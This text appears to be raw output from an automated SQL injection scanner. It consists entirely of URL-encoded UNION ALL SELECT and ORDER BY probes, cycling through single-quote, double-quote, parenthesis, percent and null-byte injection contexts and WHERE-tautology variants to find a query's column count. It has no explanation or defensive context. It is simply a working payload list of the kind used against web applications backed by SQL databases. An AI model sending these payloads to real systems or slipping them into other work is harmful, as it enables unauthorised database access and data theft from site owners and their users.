-4070%27%20UNION%20ALL%20SELECT%203531--%20 -7883%27%20UNION%20ALL%20SELECT%204899%2C4899--%20 -5738%27%20UNION%20ALL%20SELECT%205267%2C5267%2C5267--%20 -8244%27%20UNION%20ALL%20SELECT%201319%2C1319%2C1319%2C1319--%20 -5595%27%20UNION%20ALL%20SELECT%204908%2C4908%2C4908%2C4908%2C4908--%20 -9377%27%20UNION%20ALL%20SELECT%202086%2C2086%2C2086%2C2086%2C2086%2C2086--%20 -4764%27%20UNION%20ALL%20SELECT%204601%2C4601%2C4601%2C4601%2C4601%2C4601%2C4601--%20 -7283%27%20UNION%20ALL%20SELECT%208561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561%2C8561--%20 -7157%27%20UNION%20ALL%20SELECT%208869%2C8869%2C8869%2C8869%2C8869%2C8869%2C8869%2C8869%2C8869--%20 -5825%27%20UNION%20ALL%20SELECT%205402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402%2C5402--%20 -7595%27%29%20ORDER%20BY%201--%20 -4161%27%29%20ORDER%20BY%208006--%20 -8878%27%29%20UNION%20ALL%20SELECT%204123--%20 -9732%27%29%20UNION%20ALL%20SELECT%204540%2C4540--%20 -5775%27%29%20UNION%20ALL%20SELECT%205067%2C5067%2C5067--%20 -8882%27%29%20UNION%20ALL%20SELECT%202478%2C2478%2C2478%2C2478--%20 -4369%27%29%20UNION%20ALL%20SELECT%203326%2C3326%2C3326%2C3326%2C3326--%20 -4736%27%29%20UNION%20ALL%20SELECT%205352%2C5352%2C5352%2C5352%2C5352%2C5352--%20 -3616%27%29%20UNION%20ALL%20SELECT%208239%2C8239%2C8239%2C8239%2C8239%2C8239%2C8239--%20 -4155%27%29%20UNION%20ALL%20SELECT%207779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779--%20 -1855%27%29%20UNION%20ALL%20SELECT%205785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785%2C5785--%20 -7649%27%29%20UNION%20ALL%20SELECT%208985%2C8985%2C8985%2C8985%2C8985%2C8985%2C8985%2C8985%2C8985%2C8985--%20 -9357%27%29%29%20ORDER%20BY%201--%20 -8379%27%29%29%20ORDER%20BY%209468--%20 -3229%27%29%29%20UNION%20ALL%20SELECT%209040--%20 -4767%27%29%29%20UNION%20ALL%20SELECT%207048%2C7048--%20 -1430%27%29%29%20UNION%20ALL%20SELECT%207138%2C7138%2C7138--%20 -1543%27%29%29%20UNION%20ALL%20SELECT%201852%2C1852%2C1852%2C1852--%20 -8574%27%29%29%20UNION%20ALL%20SELECT%202695%2C2695%2C2695%2C2695%2C2695--%20 -7793%27%29%29%20UNION%20ALL%20SELECT%204816%2C4816%2C4816%2C4816%2C4816%2C4816--%20 -1217%27%29%29%20UNION%20ALL%20SELECT%201993%2C1993%2C1993%2C1993%2C1993%2C1993%2C1993--%20 -3154%27%29%29%20UNION%20ALL%20SELECT%208006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006--%20 -7659%27%29%29%20UNION%20ALL%20SELECT%208570%2C8570%2C8570%2C8570%2C8570%2C8570%2C8570%2C8570%2C8570--%20 -5864%27%29%29%20UNION%20ALL%20SELECT%204265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265--%20 -3306%27%29%29%29%20ORDER%20BY%201--%20 -6040%27%29%29%29%20ORDER%20BY%209643--%20 -8280%27%29%29%29%20UNION%20ALL%20SELECT%204243--%20 -6263%27%29%29%29%20UNION%20ALL%20SELECT%202100%2C2100--%20 -7171%27%29%29%29%20UNION%20ALL%20SELECT%204662%2C4662%2C4662--%20 -4450%27%29%29%29%20UNION%20ALL%20SELECT%207122%2C7122%2C7122%2C7122--%20 -8378%27%29%29%29%20UNION%20ALL%20SELECT%203683%2C3683%2C3683%2C3683%2C3683--%20 -7704%27%29%29%29%20UNION%20ALL%20SELECT%208530%2C8530%2C8530%2C8530%2C8530%2C8530--%20 -9946%27%29%29%29%20UNION%20ALL%20SELECT%201604%2C1604%2C1604%2C1604%2C1604%2C1604%2C1604--%20 -8218%27%29%29%29%20UNION%20ALL%20SELECT%201971%2C1971%2C1971%2C1971%2C1971%2C1971%2C1971%2C1971--%20 -1962%27%29%29%29%20UNION%20ALL%20SELECT%204749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749%2C4749--%20 -7095%27%29%29%29%20UNION%20ALL%20SELECT%206783%2C6783%2C6783%2C6783%2C6783%2C6783%2C6783%2C6783%2C6783%2C6783--%20 -6653%27%20ORDER%20BY%201--%20 -2749%27%20ORDER%20BY%207325--%20 -2430%27%20UNION%20ALL%20SELECT%205993--%20 -6794%27%20UNION%20ALL%20SELECT%206861%2C6861--%20 -4819%27%20UNION%20ALL%20SELECT%208982%2C8982%2C8982--%20 -8324%27%20UNION%20ALL%20SELECT%202607%2C2607%2C2607%2C2607--%20 -8464%27%20UNION%20ALL%20SELECT%201077%2C1077%2C1077%2C1077%2C1077--%20 -1381%27%20UNION%20ALL%20SELECT%201982%2C1982%2C1982%2C1982%2C1982%2C1982--%20 -5865%27%20UNION%20ALL%20SELECT%205391%2C5391%2C5391%2C5391%2C5391%2C5391%2C5391--%20 -6793%27%20UNION%20ALL%20SELECT%208666%2C8666%2C8666%2C8666%2C8666%2C8666%2C8666%2C8666--%20 -8773%27%20UNION%20ALL%20SELECT%203937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937--%20 -7879%27%20UNION%20ALL%20SELECT%207778%2C7778%2C7778%2C7778%2C7778%2C7778%2C7778%2C7778%2C7778%2C7778--%20 -9165%22%29%20ORDER%20BY%201--%20 -1370%22%29%20ORDER%20BY%208784--%20 -8484%22%29%20UNION%20ALL%20SELECT%207621--%20 -3898%22%29%20UNION%20ALL%20SELECT%205561%2C5561--%20 -4566%22%29%20UNION%20ALL%20SELECT%205361%2C5361%2C5361--%20 -2752%22%29%20UNION%20ALL%20SELECT%202154%2C2154%2C2154%2C2154--%20 -7821%22%29%20UNION%20ALL%20SELECT%201533%2C1533%2C1533%2C1533%2C1533--%20 -2146%22%29%20UNION%20ALL%20SELECT%204861%2C4861%2C4861%2C4861%2C4861%2C4861--%20 -3683%22%29%20UNION%20ALL%20SELECT%202935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935--%20 -8227%22%29%20UNION%20ALL%20SELECT%201871%2C1871%2C1871%2C1871%2C1871%2C1871%2C1871%2C1871--%20 -3987%22%29%20UNION%20ALL%20SELECT%205303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303%2C5303--%20 -7819%22%29%20UNION%20ALL%20SELECT%208539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539--%20 -1257%22%29%29%20ORDER%20BY%201--%20 -6735%22%29%29%20ORDER%20BY%202387--%20 -4060%22%29%29%20UNION%20ALL%20SELECT%206660--%20 -8952%22%29%29%20UNION%20ALL%20SELECT%202068%2C2068--%20 -7748%22%29%29%20UNION%20ALL%20SELECT%209468%2C9468%2C9468--%20 -8664%22%29%29%20UNION%20ALL%20SELECT%206904%2C6904%2C6904%2C6904--%20 -4283%22%29%29%20UNION%20ALL%20SELECT%201953%2C1953%2C1953%2C1953%2C1953--%20 -8960%22%29%29%20UNION%20ALL%20SELECT%202955%2C2955%2C2955%2C2955%2C2955%2C2955--%20 -2850%22%29%29%20UNION%20ALL%20SELECT%206805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805--%20 -9503%22%29%29%20UNION%20ALL%20SELECT%202814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814--%20 -8565%22%29%29%20UNION%20ALL%20SELECT%201529%2C1529%2C1529%2C1529%2C1529%2C1529%2C1529%2C1529%2C1529--%20 -3024%22%29%29%20UNION%20ALL%20SELECT%204063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063--%20 -5497%22%29%29%29%20ORDER%20BY%201--%20 -8123%22%29%29%29%20ORDER%20BY%206212--%20 -9908%22%29%29%29%20UNION%20ALL%20SELECT%207880--%20 -2771%22%29%29%29%20UNION%20ALL%20SELECT%207354%2C7354--%20 -7100%22%29%29%29%20UNION%20ALL%20SELECT%207569%2C7569%2C7569--%20 -9709%22%29%29%29%20UNION%20ALL%20SELECT%208787%2C8787%2C8787%2C8787--%20 -7475%22%29%29%29%20UNION%20ALL%20SELECT%209615%2C9615%2C9615%2C9615%2C9615--%20 -5538%22%29%29%29%20UNION%20ALL%20SELECT%207605%2C7605%2C7605%2C7605%2C7605%2C7605--%20 -7312%22%29%29%29%20UNION%20ALL%20SELECT%206682%2C6682%2C6682%2C6682%2C6682%2C6682%2C6682--%20 -7410%22%29%29%29%20UNION%20ALL%20SELECT%208319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319%2C8319--%20 -4132%22%29%29%29%20UNION%20ALL%20SELECT%208528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528--%20 -9792%22%29%29%29%20UNION%20ALL%20SELECT%204909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909--%20 -9412%22%20ORDER%20BY%201--%20 -5860%22%20ORDER%20BY%205654--%20 -9855%22%20UNION%20ALL%20SELECT%209190--%20 -1828%22%20UNION%20ALL%20SELECT%207603%2C7603--%20 -6310%22%20UNION%20ALL%20SELECT%201572%2C1572%2C1572--%20 -8014%22%20UNION%20ALL%20SELECT%208457%2C8457%2C8457%2C8457--%20 -3648%22%20UNION%20ALL%20SELECT%204902%2C4902%2C4902%2C4902%2C4902--%20 -8494%22%20UNION%20ALL%20SELECT%204248%2C4248%2C4248%2C4248%2C4248%2C4248--%20 -7313%22%20UNION%20ALL%20SELECT%202310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310--%20 -6391%22%20UNION%20ALL%20SELECT%208942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942%2C8942--%20 -7560%22%20UNION%20ALL%20SELECT%205909%2C5909%2C5909%2C5909%2C5909%2C5909%2C5909%2C5909%2C5909--%20 -6185%22%20UNION%20ALL%20SELECT%207317%2C7317%2C7317%2C7317%2C7317%2C7317%2C7317%2C7317%2C7317%2C7317--%20 -1550%22%29%20ORDER%20BY%201--%20 -4996%22%29%20ORDER%20BY%208614--%20 -5613%22%29%20UNION%20ALL%20SELECT%209655--%20 -5738%22%29%20UNION%20ALL%20SELECT%204514%2C4514--%20 -3498%22%29%20UNION%20ALL%20SELECT%209439%2C9439%2C9439--%20 -6141%22%29%20UNION%20ALL%20SELECT%204039%2C4039%2C4039%2C4039--%20 -9391%22%29%20UNION%20ALL%20SELECT%209662%2C9662%2C9662%2C9662%2C9662--%20 -8958%22%29%20UNION%20ALL%20SELECT%202875%2C2875%2C2875%2C2875%2C2875%2C2875--%20 -2957%22%29%20UNION%20ALL%20SELECT%204459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459--%20 -9412%22%29%20UNION%20ALL%20SELECT%207607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607--%20 -3951%22%29%20UNION%20ALL%20SELECT%206684%2C6684%2C6684%2C6684%2C6684%2C6684%2C6684%2C6684%2C6684--%20 -3000%22%29%20UNION%20ALL%20SELECT%205686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686--%20 -2462%22%29%29%20ORDER%20BY%201--%20 -2553%22%29%29%20ORDER%20BY%203075--%20 -2334%22%29%29%20UNION%20ALL%20SELECT%208530--%20 -3349%22%29%29%20UNION%20ALL%20SELECT%206972%2C6972--%20 -6776%22%29%29%20UNION%20ALL%20SELECT%209740%2C9740%2C9740--%20 -6862%22%29%29%20UNION%20ALL%20SELECT%205642%2C5642%2C5642%2C5642--%20 -2071%22%29%29%20UNION%20ALL%20SELECT%208598%2C8598%2C8598%2C8598%2C8598--%20 -7666%22%29%29%20UNION%20ALL%20SELECT%208369%2C8369%2C8369%2C8369%2C8369%2C8369--%20 -5316%22%29%29%20UNION%20ALL%20SELECT%202531%2C2531%2C2531%2C2531%2C2531%2C2531%2C2531--%20 -9155%22%29%29%20UNION%20ALL%20SELECT%207771%2C7771%2C7771%2C7771%2C7771%2C7771%2C7771%2C7771--%20 -3426%22%29%29%20UNION%20ALL%20SELECT%204202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202--%20 -1632%22%29%29%20UNION%20ALL%20SELECT%206709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709%2C6709--%20 -3293%22%29%29%29%20ORDER%20BY%201--%20 -1843%22%29%29%29%20ORDER%20BY%201001--%20 -1572%22%29%29%29%20UNION%20ALL%20SELECT%204493--%20 -3023%22%29%29%29%20UNION%20ALL%20SELECT%201776%2C1776--%20 -1750%22%29%29%29%20UNION%20ALL%20SELECT%207499%2C7499%2C7499--%20 -9802%22%29%29%29%20UNION%20ALL%20SELECT%208327%2C8327%2C8327%2C8327--%20 -3908%22%29%29%29%20UNION%20ALL%20SELECT%209157%2C9157%2C9157%2C9157%2C9157--%20 -7251%22%29%29%29%20UNION%20ALL%20SELECT%205321%2C5321%2C5321%2C5321%2C5321%2C5321--%20 -7050%22%29%29%29%20UNION%20ALL%20SELECT%208633%2C8633%2C8633%2C8633%2C8633%2C8633%2C8633--%20 -2625%22%29%29%29%20UNION%20ALL%20SELECT%204331%2C4331%2C4331%2C4331%2C4331%2C4331%2C4331%2C4331--%20 -4128%22%29%29%29%20UNION%20ALL%20SELECT%209495%2C9495%2C9495%2C9495%2C9495%2C9495%2C9495%2C9495%2C9495--%20 -6479%22%29%29%29%20UNION%20ALL%20SELECT%205501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501%2C5501--%20 -4017%22%20ORDER%20BY%201--%20 -3664%22%20ORDER%20BY%208156--%20 -6604%22%20UNION%20ALL%20SELECT%207416--%20 -9492%22%20UNION%20ALL%20SELECT%207708%2C7708--%20 -7580%22%20UNION%20ALL%20SELECT%201661%2C1661%2C1661--%20 -6033%22%20UNION%20ALL%20SELECT%201020%2C1020%2C1020%2C1020--%20 -8212%22%20UNION%20ALL%20SELECT%209469%2C9469%2C9469%2C9469%2C9469--%20 -4576%22%20UNION%20ALL%20SELECT%204944%2C4944%2C4944%2C4944%2C4944%2C4944--%20 -1183%22%20UNION%20ALL%20SELECT%201166%2C1166%2C1166%2C1166%2C1166%2C1166%2C1166--%20 -7679%22%20UNION%20ALL%20SELECT%201041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041%2C1041--%20 -5533%22%20UNION%20ALL%20SELECT%202932%2C2932%2C2932%2C2932%2C2932%2C2932%2C2932%2C2932%2C2932--%20 -9072%22%20UNION%20ALL%20SELECT%209210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210%2C9210--%20 -1125%25%27%29%20ORDER%20BY%201--%20 -8427%25%27%29%20ORDER%20BY%209607--%20 -7274%25%27%29%20UNION%20ALL%20SELECT%209916--%20 -2350%25%27%29%20UNION%20ALL%20SELECT%204885%2C4885--%20 -9851%25%27%29%20UNION%20ALL%20SELECT%203183%2C3183%2C3183--%20 -8182%25%27%29%20UNION%20ALL%20SELECT%206087%2C6087%2C6087%2C6087--%20 -9929%25%27%29%20UNION%20ALL%20SELECT%209827%2C9827%2C9827%2C9827%2C9827--%20 -5373%25%27%29%20UNION%20ALL%20SELECT%206795%2C6795%2C6795%2C6795%2C6795%2C6795--%20 -5601%25%27%29%20UNION%20ALL%20SELECT%208200%2C8200%2C8200%2C8200%2C8200%2C8200%2C8200--%20 -2518%25%27%29%20UNION%20ALL%20SELECT%203092%2C3092%2C3092%2C3092%2C3092%2C3092%2C3092%2C3092--%20 -3513%25%27%29%20UNION%20ALL%20SELECT%206553%2C6553%2C6553%2C6553%2C6553%2C6553%2C6553%2C6553%2C6553--%20 -4327%25%27%29%20UNION%20ALL%20SELECT%205483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483%2C5483--%20 -1583%25%27%29%29%20ORDER%20BY%201--%20 -9877%25%27%29%29%20ORDER%20BY%208123--%20 -9988%25%27%29%29%20UNION%20ALL%20SELECT%206626--%20 -9267%25%27%29%29%20UNION%20ALL%20SELECT%204930%2C4930--%20 -9986%25%27%29%29%20UNION%20ALL%20SELECT%202452%2C2452%2C2452--%20 -6112%25%27%29%29%20UNION%20ALL%20SELECT%204174%2C4174%2C4174%2C4174--%20 -6192%25%27%29%29%20UNION%20ALL%20SELECT%203297%2C3297%2C3297%2C3297%2C3297--%20 -3480%25%27%29%29%20UNION%20ALL%20SELECT%208917%2C8917%2C8917%2C8917%2C8917%2C8917--%20 -5630%25%27%29%29%20UNION%20ALL%20SELECT%207352%2C7352%2C7352%2C7352%2C7352%2C7352%2C7352--%20 -4576%25%27%29%29%20UNION%20ALL%20SELECT%203216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216%2C3216--%20 -2952%25%27%29%29%20UNION%20ALL%20SELECT%205884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884%2C5884--%20 -3268%25%27%29%29%20UNION%20ALL%20SELECT%209266%2C9266%2C9266%2C9266%2C9266%2C9266%2C9266%2C9266%2C9266%2C9266--%20 -4665%25%27%29%29%29%20ORDER%20BY%201--%20 -2525%25%27%29%29%29%20ORDER%20BY%207542--%20 -7831%25%27%29%29%29%20UNION%20ALL%20SELECT%202734--%20 -7286%25%27%29%29%29%20UNION%20ALL%20SELECT%204885%2C4885--%20 -2974%25%27%29%29%29%20UNION%20ALL%20SELECT%208767%2C8767%2C8767--%20 -8415%25%27%29%29%29%20UNION%20ALL%20SELECT%202180%2C2180%2C2180%2C2180--%20 -8626%25%27%29%29%29%20UNION%20ALL%20SELECT%205852%2C5852%2C5852%2C5852%2C5852--%20 -6282%25%27%29%29%29%20UNION%20ALL%20SELECT%207532%2C7532%2C7532%2C7532%2C7532%2C7532--%20 -1503%25%27%29%29%29%20UNION%20ALL%20SELECT%203522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522--%20 -6714%25%27%29%29%29%20UNION%20ALL%20SELECT%209160%2C9160%2C9160%2C9160%2C9160%2C9160%2C9160%2C9160--%20 -7548%25%27%29%29%29%20UNION%20ALL%20SELECT%204528%2C4528%2C4528%2C4528%2C4528%2C4528%2C4528%2C4528%2C4528--%20 -8303%25%27%29%29%29%20UNION%20ALL%20SELECT%203743%2C3743%2C3743%2C3743%2C3743%2C3743%2C3743%2C3743%2C3743%2C3743--%20 -1889%25%27%20ORDER%20BY%201--%20 -6857%25%27%20ORDER%20BY%205597--%20 -6282%25%27%20UNION%20ALL%20SELECT%208542--%20 -9335%25%27%20UNION%20ALL%20SELECT%206452%2C6452--%20 -2005%25%27%20UNION%20ALL%20SELECT%207941%2C7941%2C7941--%20 -6711%25%27%20UNION%20ALL%20SELECT%204686%2C4686%2C4686%2C4686--%20 -3811%25%27%20UNION%20ALL%20SELECT%201360%2C1360%2C1360%2C1360%2C1360--%20 -2669%25%27%20UNION%20ALL%20SELECT%206769%2C6769%2C6769%2C6769%2C6769%2C6769--%20 -4397%25%27%20UNION%20ALL%20SELECT%203205%2C3205%2C3205%2C3205%2C3205%2C3205%2C3205--%20 -2326%25%27%20UNION%20ALL%20SELECT%204212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212--%20 -6163%25%27%20UNION%20ALL%20SELECT%209624%2C9624%2C9624%2C9624%2C9624%2C9624%2C9624%2C9624%2C9624--%20 -5462%25%27%20UNION%20ALL%20SELECT%209278%2C9278%2C9278%2C9278%2C9278%2C9278%2C9278%2C9278%2C9278%2C9278--%20 -4220%00%27%29%20ORDER%20BY%201--%20 -9145%00%27%29%20ORDER%20BY%208762--%20 -9855%00%27%29%20UNION%20ALL%20SELECT%201400--%20 -5264%00%27%29%20UNION%20ALL%20SELECT%209437%2C9437--%20 -4950%00%27%29%20UNION%20ALL%20SELECT%205777%2C5777%2C5777--%20 -9698%00%27%29%20UNION%20ALL%20SELECT%209321%2C9321%2C9321%2C9321--%20 -2105%00%27%29%20UNION%20ALL%20SELECT%203922%2C3922%2C3922%2C3922%2C3922--%20 -7819%00%27%29%20UNION%20ALL%20SELECT%209726%2C9726%2C9726%2C9726%2C9726%2C9726--%20 -7981%00%27%29%20UNION%20ALL%20SELECT%208795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795--%20 -2004%00%27%29%20UNION%20ALL%20SELECT%207525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525%2C7525--%20 -3613%00%27%29%20UNION%20ALL%20SELECT%205538%2C5538%2C5538%2C5538%2C5538%2C5538%2C5538%2C5538%2C5538--%20 -8236%00%27%29%20UNION%20ALL%20SELECT%209827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827--%20 -5459%00%27%20ORDER%20BY%201--%20 -2177%00%27%20ORDER%20BY%208655--%20 -9442%00%27%20UNION%20ALL%20SELECT%208806--%20 -4315%00%27%20UNION%20ALL%20SELECT%206919%2C6919--%20 -3943%00%27%20UNION%20ALL%20SELECT%209724%2C9724%2C9724--%20 -5944%00%27%20UNION%20ALL%20SELECT%203978%2C3978%2C3978%2C3978--%20 -4768%00%27%20UNION%20ALL%20SELECT%205067%2C5067%2C5067%2C5067%2C5067--%20 -6824%00%27%20UNION%20ALL%20SELECT%208283%2C8283%2C8283%2C8283%2C8283%2C8283--%20 -8540%00%27%20UNION%20ALL%20SELECT%205519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519--%20 -4059%00%27%20UNION%20ALL%20SELECT%205142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142--%20 -2599%00%27%20UNION%20ALL%20SELECT%203984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984%2C3984--%20 -3095%00%27%20UNION%20ALL%20SELECT%207339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339%2C7339--%20 -9496%27%29%20WHERE%209398%3D9398%20ORDER%20BY%201--%20 -9346%27%29%20WHERE%206563%3D6563%20ORDER%20BY%206718--%20 -5082%27%29%20WHERE%204537%3D4537%20UNION%20ALL%20SELECT%204537--%20 -1968%27%29%20WHERE%207773%3D7773%20UNION%20ALL%20SELECT%207773%2C7773--%20 -6654%27%29%20WHERE%205350%3D5350%20UNION%20ALL%20SELECT%205350%2C5350%2C5350--%20 -1292%27%29%20WHERE%205080%3D5080%20UNION%20ALL%20SELECT%205080%2C5080%2C5080%2C5080--%20 -5528%27%29%20WHERE%203112%3D3112%20UNION%20ALL%20SELECT%203112%2C3112%2C3112%2C3112%2C3112--%20 -1742%27%29%20WHERE%203826%3D3826%20UNION%20ALL%20SELECT%203826%2C3826%2C3826%2C3826%2C3826%2C3826--%20 -6123%27%29%20WHERE%207449%3D7449%20UNION%20ALL%20SELECT%207449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449--%20 -8345%27%29%20WHERE%206783%3D6783%20UNION%20ALL%20SELECT%206783%2C6783%2C6783%2C6783%2C6783%2C6783%2C6783%2C6783--%20 -4758%27%29%20WHERE%204462%3D4462%20UNION%20ALL%20SELECT%204462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462--%20 -4231%27%29%20WHERE%203228%3D3228%20UNION%20ALL%20SELECT%203228%2C3228%2C3228%2C3228%2C3228%2C3228%2C3228%2C3228%2C3228%2C3228--%20 -7319%22%29%20WHERE%207723%3D7723%20ORDER%20BY%201--%20 -6084%22%29%20WHERE%201511%3D1511%20ORDER%20BY%206780--%20 -7775%22%29%20WHERE%209925%3D9925%20UNION%20ALL%20SELECT%209925--%20 -6327%22%29%20WHERE%204077%3D4077%20UNION%20ALL%20SELECT%204077%2C4077--%20 -5183%22%29%20WHERE%201664%3D1664%20UNION%20ALL%20SELECT%201664%2C1664%2C1664--%20 -3569%22%29%20WHERE%209712%3D9712%20UNION%20ALL%20SELECT%209712%2C9712%2C9712%2C9712--%20 -8752%22%29%20WHERE%204974%3D4974%20UNION%20ALL%20SELECT%204974%2C4974%2C4974%2C4974%2C4974--%20 -7182%22%29%20WHERE%203478%3D3478%20UNION%20ALL%20SELECT%203478%2C3478%2C3478%2C3478%2C3478%2C3478--%20 -2730%22%29%20WHERE%209129%3D9129%20UNION%20ALL%20SELECT%209129%2C9129%2C9129%2C9129%2C9129%2C9129%2C9129--%20 -7711%22%29%20WHERE%208149%3D8149%20UNION%20ALL%20SELECT%208149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149%2C8149--%20 -3085%22%29%20WHERE%204484%3D4484%20UNION%20ALL%20SELECT%204484%2C4484%2C4484%2C4484%2C4484%2C4484%2C4484%2C4484%2C4484--%20 -1615%22%29%20WHERE%202049%3D2049%20UNION%20ALL%20SELECT%202049%2C2049%2C2049%2C2049%2C2049%2C2049%2C2049%2C2049%2C2049%2C2049--%20 -3604%29%20WHERE%207868%3D7868%20ORDER%20BY%201--%20 -1299%29%20WHERE%202881%3D2881%20ORDER%20BY%205777--%20 -1122%29%20WHERE%203726%3D3726%20UNION%20ALL%20SELECT%203726--%20 -4886%29%20WHERE%201694%3D1694%20UNION%20ALL%20SELECT%201694%2C1694--%20 -7325%29%20WHERE%206769%3D6769%20UNION%20ALL%20SELECT%206769%2C6769%2C6769--%20 -7478%29%20WHERE%201463%3D1463%20UNION%20ALL%20SELECT%201463%2C1463%2C1463%2C1463--%20 -5330%29%20WHERE%201886%3D1886%20UNION%20ALL%20SELECT%201886%2C1886%2C1886%2C1886%2C1886--%20 -8413%29%20WHERE%206109%3D6109%20UNION%20ALL%20SELECT%206109%2C6109%2C6109%2C6109%2C6109%2C6109--%20 -1642%29%20WHERE%203106%3D3106%20UNION%20ALL%20SELECT%203106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106--%20 -4828%29%20WHERE%201188%3D1188%20UNION%20ALL%20SELECT%201188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188--%20 -9194%29%20WHERE%205654%3D5654%20UNION%20ALL%20SELECT%205654%2C5654%2C5654%2C5654%2C5654%2C5654%2C5654%2C5654%2C5654--%20 -3350%29%20WHERE%204996%3D4996%20UNION%20ALL%20SELECT%204996%2C4996%2C4996%2C4996%2C4996%2C4996%2C4996%2C4996%2C4996%2C4996--%20 -8808%27%20WHERE%207344%3D7344%20ORDER%20BY%201--%20 -6733%27%20WHERE%204437%3D4437%20ORDER%20BY%207210--%20 -9306%27%20WHERE%209977%3D9977%20UNION%20ALL%20SELECT%209977--%20 -4072%27%20WHERE%201117%3D1117%20UNION%20ALL%20SELECT%201117%2C1117--%20 -1191%27%20WHERE%201469%3D1469%20UNION%20ALL%20SELECT%201469%2C1469%2C1469--%20 -4875%27%20WHERE%208507%3D8507%20UNION%20ALL%20SELECT%208507%2C8507%2C8507%2C8507--%20 -8726%27%20WHERE%207574%3D7574%20UNION%20ALL%20SELECT%207574%2C7574%2C7574%2C7574%2C7574--%20 -1892%27%20WHERE%204469%3D4469%20UNION%20ALL%20SELECT%204469%2C4469%2C4469%2C4469%2C4469%2C4469--%20 -1307%27%20WHERE%206805%3D6805%20UNION%20ALL%20SELECT%206805%2C6805%2C6805%2C6805%2C6805%2C6805%2C6805--%20 -7529%27%20WHERE%201114%3D1114%20UNION%20ALL%20SELECT%201114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114%2C1114--%20 -4090%27%20WHERE%206809%3D6809%20UNION%20ALL%20SELECT%206809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809%2C6809--%20 -8255%27%20WHERE%206129%3D6129%20UNION%20ALL%20SELECT%206129%2C6129%2C6129%2C6129%2C6129%2C6129%2C6129%2C6129%2C6129%2C6129--%20 -7307%22%20WHERE%208268%3D8268%20ORDER%20BY%201--%20 -3819%22%20WHERE%207355%3D7355%20ORDER%20BY%205615--%20 -3002%22%20WHERE%204345%3D4345%20UNION%20ALL%20SELECT%204345--%20 -4023%22%20WHERE%207724%3D7724%20UNION%20ALL%20SELECT%207724%2C7724--%20 -8941%22%20WHERE%202944%3D2944%20UNION%20ALL%20SELECT%202944%2C2944%2C2944--%20 -2180%22%20WHERE%206917%3D6917%20UNION%20ALL%20SELECT%206917%2C6917%2C6917%2C6917--%20 -1623%22%20WHERE%209370%3D9370%20UNION%20ALL%20SELECT%209370%2C9370%2C9370%2C9370%2C9370--%20 -4660%22%20WHERE%205338%3D5338%20UNION%20ALL%20SELECT%205338%2C5338%2C5338%2C5338%2C5338%2C5338--%20 -3560%22%20WHERE%202206%3D2206%20UNION%20ALL%20SELECT%202206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206--%20 -2880%22%20WHERE%205422%3D5422%20UNION%20ALL%20SELECT%205422%2C5422%2C5422%2C5422%2C5422%2C5422%2C5422%2C5422--%20 -7630%22%20WHERE%209546%3D9546%20UNION%20ALL%20SELECT%209546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546--%20 -9307%22%20WHERE%202521%3D2521%20UNION%20ALL%20SELECT%202521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521--%20 -8258%20WHERE%207266%3D7266%20ORDER%20BY%201--%20 -8545%20WHERE%201098%3D1098%20ORDER%20BY%209377--%20 -2103%20WHERE%206140%3D6140%20UNION%20ALL%20SELECT%206140--%20 -3815%20WHERE%207858%3D7858%20UNION%20ALL%20SELECT%207858%2C7858--%20 -3795%20WHERE%209908%3D9908%20UNION%20ALL%20SELECT%209908%2C9908%2C9908--%20 -2406%20WHERE%209698%3D9698%20UNION%20ALL%20SELECT%209698%2C9698%2C9698%2C9698--%20 